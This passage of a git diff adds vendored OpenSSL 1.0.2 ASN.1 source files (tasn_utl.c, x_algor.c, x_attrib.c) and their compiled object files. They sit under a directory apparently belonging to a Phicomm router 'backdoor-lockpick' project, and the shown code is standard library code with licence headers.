+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stddef.h>
+#include <string.h>
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/objects.h>
+#include <openssl/err.h>
+
+/* Utility functions for manipulating fields and offsets */
+
+/* Add 'offset' to 'addr' */
+#define offset2ptr(addr, offset) (void *)(((char *) addr) + offset)
+
+/*
+ * Given an ASN1_ITEM CHOICE type return the selector value
+ */
+
+int asn1_get_choice_selector(ASN1_VALUE **pval, const ASN1_ITEM *it)
+{
+    int *sel = offset2ptr(*pval, it->utype);
+    return *sel;
+}
+
+/*
+ * Given an ASN1_ITEM CHOICE type set the selector value, return old value.
+ */
+
+int asn1_set_choice_selector(ASN1_VALUE **pval, int value,
+                             const ASN1_ITEM *it)
+{
+    int *sel, ret;
+    sel = offset2ptr(*pval, it->utype);
+    ret = *sel;
+    *sel = value;
+    return ret;
+}
+
+/*
+ * Do reference counting. The value 'op' decides what to do. if it is +1
+ * then the count is incremented. If op is 0 count is set to 1. If op is -1
+ * count is decremented and the return value is the current refrence count or
+ * 0 if no reference count exists.
+ */
+
+int asn1_do_lock(ASN1_VALUE **pval, int op, const ASN1_ITEM *it)
+{
+    const ASN1_AUX *aux;
+    int *lck, ret;
+    if ((it->itype != ASN1_ITYPE_SEQUENCE)
+        && (it->itype != ASN1_ITYPE_NDEF_SEQUENCE))
+        return 0;
+    aux = it->funcs;
+    if (!aux || !(aux->flags & ASN1_AFLG_REFCOUNT))
+        return 0;
+    lck = offset2ptr(*pval, aux->ref_offset);
+    if (op == 0) {
+        *lck = 1;
+        return 1;
+    }
+    ret = CRYPTO_add(lck, op, aux->ref_lock);
+#ifdef REF_PRINT
+    fprintf(stderr, "%s: Reference Count: %d\n", it->sname, *lck);
+#endif
+#ifdef REF_CHECK
+    if (ret < 0)
+        fprintf(stderr, "%s, bad reference count\n", it->sname);
+#endif
+    return ret;
+}
+
+static ASN1_ENCODING *asn1_get_enc_ptr(ASN1_VALUE **pval, const ASN1_ITEM *it)
+{
+    const ASN1_AUX *aux;
+    if (!pval || !*pval)
+        return NULL;
+    aux = it->funcs;
+    if (!aux || !(aux->flags & ASN1_AFLG_ENCODING))
+        return NULL;
+    return offset2ptr(*pval, aux->enc_offset);
+}
+
+void asn1_enc_init(ASN1_VALUE **pval, const ASN1_ITEM *it)
+{
+    ASN1_ENCODING *enc;
+    enc = asn1_get_enc_ptr(pval, it);
+    if (enc) {
+        enc->enc = NULL;
+        enc->len = 0;
+        enc->modified = 1;
+    }
+}
+
+void asn1_enc_free(ASN1_VALUE **pval, const ASN1_ITEM *it)
+{
+    ASN1_ENCODING *enc;
+    enc = asn1_get_enc_ptr(pval, it);
+    if (enc) {
+        if (enc->enc)
+            OPENSSL_free(enc->enc);
+        enc->enc = NULL;
+        enc->len = 0;
+        enc->modified = 1;
+    }
+}
+
+int asn1_enc_save(ASN1_VALUE **pval, const unsigned char *in, int inlen,
+                  const ASN1_ITEM *it)
+{
+    ASN1_ENCODING *enc;
+    enc = asn1_get_enc_ptr(pval, it);
+    if (!enc)
+        return 1;
+
+    if (enc->enc)
+        OPENSSL_free(enc->enc);
+    enc->enc = OPENSSL_malloc(inlen);
+    if (!enc->enc)
+        return 0;
+    memcpy(enc->enc, in, inlen);
+    enc->len = inlen;
+    enc->modified = 0;
+
+    return 1;
+}
+
+int asn1_enc_restore(int *len, unsigned char **out, ASN1_VALUE **pval,
+                     const ASN1_ITEM *it)
+{
+    ASN1_ENCODING *enc;
+    enc = asn1_get_enc_ptr(pval, it);
+    if (!enc || enc->modified)
+        return 0;
+    if (out) {
+        memcpy(*out, enc->enc, enc->len);
+        *out += enc->len;
+    }
+    if (len)
+        *len = enc->len;
+    return 1;
+}
+
+/* Given an ASN1_TEMPLATE get a pointer to a field */
+ASN1_VALUE **asn1_get_field_ptr(ASN1_VALUE **pval, const ASN1_TEMPLATE *tt)
+{
+    ASN1_VALUE **pvaltmp;
+    if (tt->flags & ASN1_TFLG_COMBINE)
+        return pval;
+    pvaltmp = offset2ptr(*pval, tt->offset);
+    /*
+     * NOTE for BOOLEAN types the field is just a plain int so we can't
+     * return int **, so settle for (int *).
+     */
+    return pvaltmp;
+}
+
+/*
+ * Handle ANY DEFINED BY template, find the selector, look up the relevant
+ * ASN1_TEMPLATE in the table and return it.
+ */
+
+const ASN1_TEMPLATE *asn1_do_adb(ASN1_VALUE **pval, const ASN1_TEMPLATE *tt,
+                                 int nullerr)
+{
+    const ASN1_ADB *adb;
+    const ASN1_ADB_TABLE *atbl;
+    long selector;
+    ASN1_VALUE **sfld;
+    int i;
+    if (!(tt->flags & ASN1_TFLG_ADB_MASK))
+        return tt;
+
+    /* Else ANY DEFINED BY ... get the table */
+    adb = ASN1_ADB_ptr(tt->item);
+
+    /* Get the selector field */
+    sfld = offset2ptr(*pval, adb->offset);
+
+    /* Check if NULL */
+    if (!sfld) {
+        if (!adb->null_tt)
+            goto err;
+        return adb->null_tt;
+    }
+
+    /*
+     * Convert type to a long: NB: don't check for NID_undef here because it
+     * might be a legitimate value in the table
+     */
+    if (tt->flags & ASN1_TFLG_ADB_OID)
+        selector = OBJ_obj2nid((ASN1_OBJECT *)*sfld);
+    else
+        selector = ASN1_INTEGER_get((ASN1_INTEGER *)*sfld);
+
+    /*
+     * Try to find matching entry in table Maybe should check application
+     * types first to allow application override? Might also be useful to
+     * have a flag which indicates table is sorted and we can do a binary
+     * search. For now stick to a linear search.
+     */
+
+    for (atbl = adb->tbl, i = 0; i < adb->tblcount; i++, atbl++)
+        if (atbl->value == selector)
+            return &atbl->tt;
+
+    /* FIXME: need to search application table too */
+
+    /* No match, return default type */
+    if (!adb->default_tt)
+        goto err;
+    return adb->default_tt;
+
+ err:
+    /* FIXME: should log the value or OID of unsupported type */
+    if (nullerr)
+        ASN1err(ASN1_F_ASN1_DO_ADB, ASN1_R_UNSUPPORTED_ANY_DEFINED_BY_TYPE);
+    return NULL;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_utl.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/tasn_utl.o
new file mode 100644
index 0000000000000000000000000000000000000000..35d5624aad65de7e8d9fdc280a575b4646853aa6
GIT binary patch
literal 3520
zcmbtVU2GIp6u!Gt*rAr`DhR6(vk!z6lyL_!QjBDO+q-0;xNVJC$Yi@a(8_kV?9L!R
z36d-&8AptXFFcsQ15ZBqWDNE}R%<9E#x(e#i9VnvQ0Rj-kOqlyJ!j_Lc9>lfqbIp@
z&;9N>-#K&cxijykGCh8uk8tskon&dnQ9`2aF5On6L?SB*H6PH4h90I?fKJr)5Vh9O
zi5t4K5EuQrNb}h+_03Ev^{IQE&po8pT59!(R-2zK<02ITNsE|~q{&RoKcnyMh@Niv
zbWy3pyxiD9EnorC7p=HhyXn(6(fo-HDs)dQ7=h^kW;<nNgR#p;L8IqZVs>}%!K2o$
zhGz#FjRq#ThEC%aq0><j=jmwBCcyOiDOzr3mK&+HotjhlcFSfR7r~hlj%UL59I{^}
zHjp;&({o3{gEW7)fA-ejjYjM;5@XC=UZ%-Uap&C2NN4_Tlc$tAH3hU@PtEC!d5fBN
z9EN+BsCihNP6W|<2<mhow%?AKHXo+Vc??R;A7-l%GNoKchDhyLkQkeHgSv`Z5o%E}
zZEXi0Yp<C01!G@eV!NTB0cu6XnCVZN*KEel$&KxBpp|xNy%D6sT58VN_#ids`_1oP
zhr?aCD(EMvRe}Rg;o%uwphO_5p-udxtMD4i^~p=X|78gtSMV_G_nS+0PW~!FA*$_8
zG4nHXqNAB#0|hjW5r*`;zdN;>Hol_WL1Q_s)x|jpo{_oRVA3^rUa7w|bYM!)RZFU&
z7v(%5y@|w*aM$3lQPPcYxBQYE*`mB+*h}Tq)`%S0w#k7Z5tKF<SjlBDdiM+xKOuF*
z?4yNwH4GHri7fFQ3;Nb|1jG-aUg)#l-XUZYn-PmJz0-vyna;V;?oEdEyX=Zg=X@bp
zpJv#rIH#mw&2LB|s9i8VMhry9M~@VI-%q8`Ss^KfYi<4^DU_6gaWuww*U$ze>r6KG
zGt)5+3Ubcd8X+Iy4DrtTlTxTAB&4waj1-DV!I&MMSv61CN^RtiM)MBV6nC3NSgiJ=
zdxCvBk76CL^t*U?t<XxaPw`QE2M;uZwmlT5g$QIt6S~1huuGanAj_LT%<C!0ljq0#
zA<ppa%!BvD5W_PJ=Y25(Ydk-%oC2T~{sG_^_X2a^@v&DB=Y3%J6JVdfXvOn6vlrNr
z**yl>H;=Ku!R+5*_Po!2WB7H3^IltE_%95%`wcKZtXt)S-_}<6`p4kJ^-+M&gQ6bN
zbX6<m)p5Ndk5(%=IYQ)2B0?57^CRWayrx#QqL$ao6=$OgUM)8YWwlt&A0}#VrY|1L
zsC_*>{iy+UAQsQ0RFcT<+dI&w<_ZPJ$_|3jM@yr+!;Gtg6;0!|w!Uar%^h9b8Os$R
z)RI?4t3rO-QsxIowPFEZ%z+@aTw$1`vRQT9fS0aR;BETiyVUaV+gnSc1rqDuqp0aU
z1F7Cr7V83KckVmZ9|r!~|AN0B%5Bh5+F-1L!EuG1n-_nL;a;Ak%l>H>&jvIEL7rz|
zaQ<yB{8<;i(}k~d;pag|K_2WA&JzY51>Kmdz20U&mvDYhs0ZiwbiW7Z_jKHY^Luy3
zgY$cL(S!5*^{ofz_voev=lAHo2j};Q$kpRxdTtnIz2eLxT&rlsoUCidbRrjWdXC7$
z)hdxIWn7@SA}d7Bm&eAm5}1_Ax+cRfaZ6RtL8CkCLnT8Vuaw8Nihdkikx(0fKF*D4
zETR87g~1<N#rs8#0*0cy4-wX^t?WH~U{7EVL}9q)0s95~$iOFHMqiPw`FCj}!}<T8
zZIjPDaXIdd{{n0v=YREAz!y2U!f*?Zk9oU=$LDhtHc^kbjX=M`@_*igb3Z<(VV~=6
z)4Tuj{r7<rmfCAR&w#L-6m(vH4j%yp<9q#ste_!Ja$f%;__jL#8D==o0%09jz~KJ;
x{9DCFmo6j)xyTah03C<dA342e4-mP=8hVQ-f6tOU`56B?5`&y{rp2e%{~ywo9$f$c

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_algor.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_algor.c
new file mode 100644
index 0000000..fd7d16d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_algor.c
@@ -0,0 +1,148 @@
+/* x_algor.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stddef.h>
+#include <openssl/x509.h>
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+
+ASN1_SEQUENCE(X509_ALGOR) = {
+        ASN1_SIMPLE(X509_ALGOR, algorithm, ASN1_OBJECT),
+        ASN1_OPT(X509_ALGOR, parameter, ASN1_ANY)
+} ASN1_SEQUENCE_END(X509_ALGOR)
+
+ASN1_ITEM_TEMPLATE(X509_ALGORS) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_SEQUENCE_OF, 0, algorithms, X509_ALGOR)
+ASN1_ITEM_TEMPLATE_END(X509_ALGORS)
+
+IMPLEMENT_ASN1_FUNCTIONS(X509_ALGOR)
+IMPLEMENT_ASN1_ENCODE_FUNCTIONS_fname(X509_ALGORS, X509_ALGORS, X509_ALGORS)
+IMPLEMENT_ASN1_DUP_FUNCTION(X509_ALGOR)
+
+IMPLEMENT_STACK_OF(X509_ALGOR)
+IMPLEMENT_ASN1_SET_OF(X509_ALGOR)
+
+int X509_ALGOR_set0(X509_ALGOR *alg, ASN1_OBJECT *aobj, int ptype, void *pval)
+{
+    if (!alg)
+        return 0;
+    if (ptype != V_ASN1_UNDEF) {
+        if (alg->parameter == NULL)
+            alg->parameter = ASN1_TYPE_new();
+        if (alg->parameter == NULL)
+            return 0;
+    }
+    if (alg) {
+        if (alg->algorithm)
+            ASN1_OBJECT_free(alg->algorithm);
+        alg->algorithm = aobj;
+    }
+    if (ptype == 0)
+        return 1;
+    if (ptype == V_ASN1_UNDEF) {
+        if (alg->parameter) {
+            ASN1_TYPE_free(alg->parameter);
+            alg->parameter = NULL;
+        }
+    } else
+        ASN1_TYPE_set(alg->parameter, ptype, pval);
+    return 1;
+}
+
+void X509_ALGOR_get0(ASN1_OBJECT **paobj, int *pptype, void **ppval,
+                     X509_ALGOR *algor)
+{
+    if (paobj)
+        *paobj = algor->algorithm;
+    if (pptype) {
+        if (algor->parameter == NULL) {
+            *pptype = V_ASN1_UNDEF;
+            return;
+        } else
+            *pptype = algor->parameter->type;
+        if (ppval)
+            *ppval = algor->parameter->value.ptr;
+    }
+}
+
+/* Set up an X509_ALGOR DigestAlgorithmIdentifier from an EVP_MD */
+
+void X509_ALGOR_set_md(X509_ALGOR *alg, const EVP_MD *md)
+{
+    int param_type;
+
+    if (md->flags & EVP_MD_FLAG_DIGALGID_ABSENT)
+        param_type = V_ASN1_UNDEF;
+    else
+        param_type = V_ASN1_NULL;
+
+    X509_ALGOR_set0(alg, OBJ_nid2obj(EVP_MD_type(md)), param_type, NULL);
+
+}
+
+int X509_ALGOR_cmp(const X509_ALGOR *a, const X509_ALGOR *b)
+{
+    int rv;
+    rv = OBJ_cmp(a->algorithm, b->algorithm);
+    if (rv)
+        return rv;
+    if (!a->parameter && !b->parameter)
+        return 0;
+    return ASN1_TYPE_cmp(a->parameter, b->parameter);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_algor.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_algor.o
new file mode 100644
index 0000000000000000000000000000000000000000..94df2706ee2f81ce7066a8fa7f34e59be6142b2a
GIT binary patch
literal 5128
zcmbtXU2GIp6u!G#=<wsPAcP_WM@1<ro88K<__Nb?+kvd@hPGIKn(4N?Lb2_xyR)%K
z5X@TQWFdkv#>8lhiHQ$9@ZbXvJP=82jQXI73DKA|rVsqYzkt}Fu%2`0p6>1JPB40s
zyXTzm{M~zI=H9zUWAQe>&&P;->={<k2xaVzMHM;9#VA|C7PIS%R^KvC-h;>${BiVU
zF8yhjzR{)MCEmVcoSdCP@6o$^y7YuGUM|duMW(K04g0U{_6_^H?e^EjTjjzcqqGf-
z*6Pbx>e_OncvNA9t6Vee7R4C9U`<^6K5jpxpU3r%|7@){N{5x=?Q&r$2Hx+uPP8aI
zK`?G#wSRGZxn)nQJ-N3}->3Io<ZFhIxkkxn*!9NvO-nOMI@T!EPs}X?T`VcKYK(tt
z)f=U#V%UBj1Zyzt+lKvT!YH)`i<62`oc6_5Oz{GGacZtTp_jjMwBA<xC&T{Lus`pM
ze4+2Va`R5PjD;~nmtkLrUX(T&rDwS}6u!?W9Z`%@9%cb8!Z|6s_xAB;v}bSM#omqK
zt)?Dt@7&qNlEeEmxgqPoNS;;T3d*v{Tyi9BrE}N`55h$vd6+%nI#0{LGtj#lbh-Oo
zy4&tD-&LhL<fxF~=It#lPil=l1BFqmpluC35el!5Y%Xv$@@i8!6yC7Tft^5HKhA9q
zjP{Nm2J^mvSO5mnQin0$D?6EQEa+RguwFR@lfjr(!bWRD9<G74*1&peV8b=AV>Ph1
z1$M9C8-RZz<kQI8)Zj^fv)XVXpsU*PI$don&S_S|{=;fxtE%a0L$exeRu!D@B>DsK
z9Rc_n7&j0A;`4@FC;Sj{JkYLcgKEPLHQ1^u3~R0u4`mxV$JF3)f2-P148&AzV7}U*
zt3h2=VhbSF5z)(&FjXD<z2^HHsJSEJGoq(7J8b|m)uI4@%GH(tn_C4g0K^A)R9G4X
zzn|lkw=W@ZWC2#eB^YqbR!sr6uo?s;!1#V#Wec$RRagX&B~pLznIc7DEQa|X1CF%C
zVXOl<`3Q)!ln0J`4(6vA;;(u5zbX7R;7H{Efh2Q-_&Ea{^M{2_{^vm_S(rHc5`NJ?
zDnRo20d!n15v}(s0O+3(2J*ip@P2{Qw=_?D+X9|p%K^tcd4cfn4CJ*Q{#!ioHV?eV
z10Mt&>(&8BqVF^>@T~&p-zwP0L8mqH0P%C$1AkxSIU@4#Zy93Fc=&(nfq&+Kf8&9(
zF_RyAp+V`)>oSL|^oVI$5@zPpFCmg@8ZxERu_8hYGuz{x&3fGIY-{U^b(`IKb3A4;
zy{jYQWQ1Tg)RdAFRE%Jd>y4&gmLgG;YQ2z4rzI;_XV0ula>w<!>dIy_Rme)oP?JjK
z(^lBAb~f*bwRD@6+TFVoF>_{~Tyq&ASkAQ{bIs0ej-*&@SHgU*)wB*}(+rB3qeH2t
z%)mj}b8sZfO~`r6c(oZ#ObwRFje5s!TryC-c<<mmWq5V{+qs^UmwVuAJ@CyQc)NtJ
z0GaYX?|~nbaCtr-2^>$1)i5Z}SqaBIpK#n~kkDU)LHHjaBO(3(48nK8`;Ub98W@D9
zB>Z6se@nu#C*)5j1?E{S;dBQ<9QQEte;i~a#FxP!{3!&15XWahcpO0>cm912%yBt?
zM#6Cpl;^B8e>^h@r#%VHxJyT2AcY+UJDhU|6Dp(o5#hA{e#sx7Bhe`#p#MAqfzxxO
zJoNrGNd9>Ddr;__gs&4avZ#<L5B1lO@JEG=OcSynI1VDbHz5&DeW5&rYut-5>ObMs
zudJ{W9u@lQE<7RhcU^eD(9gJVI^U*TIGsP!E}YIE4I2YQ^P%&Eh4P0+tmFW2E9dY7
zB<0e>$&i&EvsfsVw2~||kk7MFE`tiXM?w)$(TO7<fiX0k8B7jW<193o85v2BLbB0}
zl@7sWetq6b4!$V#{iB6YHkZk!bJigdojw42D*Ur@X8!+vH3-KRRBj+nzNo|4Inf`X
za$k~>uY`f$UKEB*m&BDXh>ZopcOFyGO_Sc^M+EM^5l_47f*U6{jPEn%{IBtN55=5K
zFl3_on`97Vs!u#7Fn9f^Sob+syynuQpx5f(WwCLb68_jfd`9m6^#O)+an~n+z9Vqq
zqzO)}7lc~%$HY~>UpQiYtnIFk=M&Zs!;mQ<CiIvLf=qoQj^8cGvg_fh1vyr?ZxLWT
zvqigSQXCWU+6>|dG=GBM0|9fo<3AMf30FaP{5ud^tACe7{}d6A{X>Z2>HV)&8{F7$
sm=s76JP5LiI)XqHk7q`$R!s}XA6@fzsr*c?6+el^fIfEE%&$BC9{^vds{jB1

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_attrib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_attrib.c
new file mode 100644
index 0000000..93ef53b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_attrib.c
@@ -0,0 +1,124 @@
+/* crypto/asn1/x_attrib.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/objects.h>
+#include <openssl/asn1t.h>
+#include <openssl/x509.h>
+
+/*-
+ * X509_ATTRIBUTE: this has the following form:
+ *
+ * typedef struct x509_attributes_st
+ *      {
+ *      ASN1_OBJECT *object;
+ *      int single;
+ *      union   {
+ *              char            *ptr;
+ *              STACK_OF(ASN1_TYPE) *set;
+ *              ASN1_TYPE       *single;
+ *              } value;
+ *      } X509_ATTRIBUTE;
+ *
+ * this needs some extra thought because the CHOICE type is
+ * merged with the main structure and because the value can
+ * be anything at all we *must* try the SET OF first because
+ * the ASN1_ANY type will swallow anything including the whole
+ * SET OF structure.
+ */
+
+ASN1_CHOICE(X509_ATTRIBUTE_SET) = {
+        ASN1_SET_OF(X509_ATTRIBUTE, value.set, ASN1_ANY),
+        ASN1_SIMPLE(X509_ATTRIBUTE, value.single, ASN1_ANY)
+} ASN1_CHOICE_END_selector(X509_ATTRIBUTE, X509_ATTRIBUTE_SET, single)
+
+ASN1_SEQUENCE(X509_ATTRIBUTE) = {
+        ASN1_SIMPLE(X509_ATTRIBUTE, object, ASN1_OBJECT),
+        /* CHOICE type merged with parent */
+        ASN1_EX_COMBINE(0, 0, X509_ATTRIBUTE_SET)
+} ASN1_SEQUENCE_END(X509_ATTRIBUTE)
+
+IMPLEMENT_ASN1_FUNCTIONS(X509_ATTRIBUTE)
+IMPLEMENT_ASN1_DUP_FUNCTION(X509_ATTRIBUTE)
+
+X509_ATTRIBUTE *X509_ATTRIBUTE_create(int nid, int atrtype, void *value)
+{
+    X509_ATTRIBUTE *ret = NULL;
+    ASN1_TYPE *val = NULL;
+
+    if ((ret = X509_ATTRIBUTE_new()) == NULL)
+        return (NULL);
+    ret->object = OBJ_nid2obj(nid);
+    ret->single = 0;
+    if ((ret->value.set = sk_ASN1_TYPE_new_null()) == NULL)
+        goto err;
+    if ((val = ASN1_TYPE_new()) == NULL)
+        goto err;
+    if (!sk_ASN1_TYPE_push(ret->value.set, val))
+        goto err;
+
+    ASN1_TYPE_set(val, atrtype, value);
+    return (ret);
+ err:
+    if (ret != NULL)
+        X509_ATTRIBUTE_free(ret);
+    if (val != NULL)
+        ASN1_TYPE_free(val);
+    return (NULL);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_attrib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/x_attrib.o
new file mode 100644
index 0000000000000000000000000000000000000000..a63480fcb265af23d76c5c0578badd030b8bae14
GIT binary patch
literal 4392
zcmbuCO>7%g5XYb6l!g*qCwv(SWm_T$qFLFYQCq&`b>hUStR!k2lu8L3$5|RT{s{KE
zq!lU=X^~bClv6o?1VXBmV-6g0tVAiCIdFgjJs<&sf&le`D$306O!EA)OC=a-cV>R?
zKkq%i-F>@$Go2l5355h(NW3JrGp0hUw{OQuH%y97(INiayZ^7u>b*#Q!jqRjpyV$q
zd0%tx{GC~CmKZM&J6{_UhI7-%O=MPni8*g{wf~4!??8~bc*QObJ6By`d@<0~hAqQR
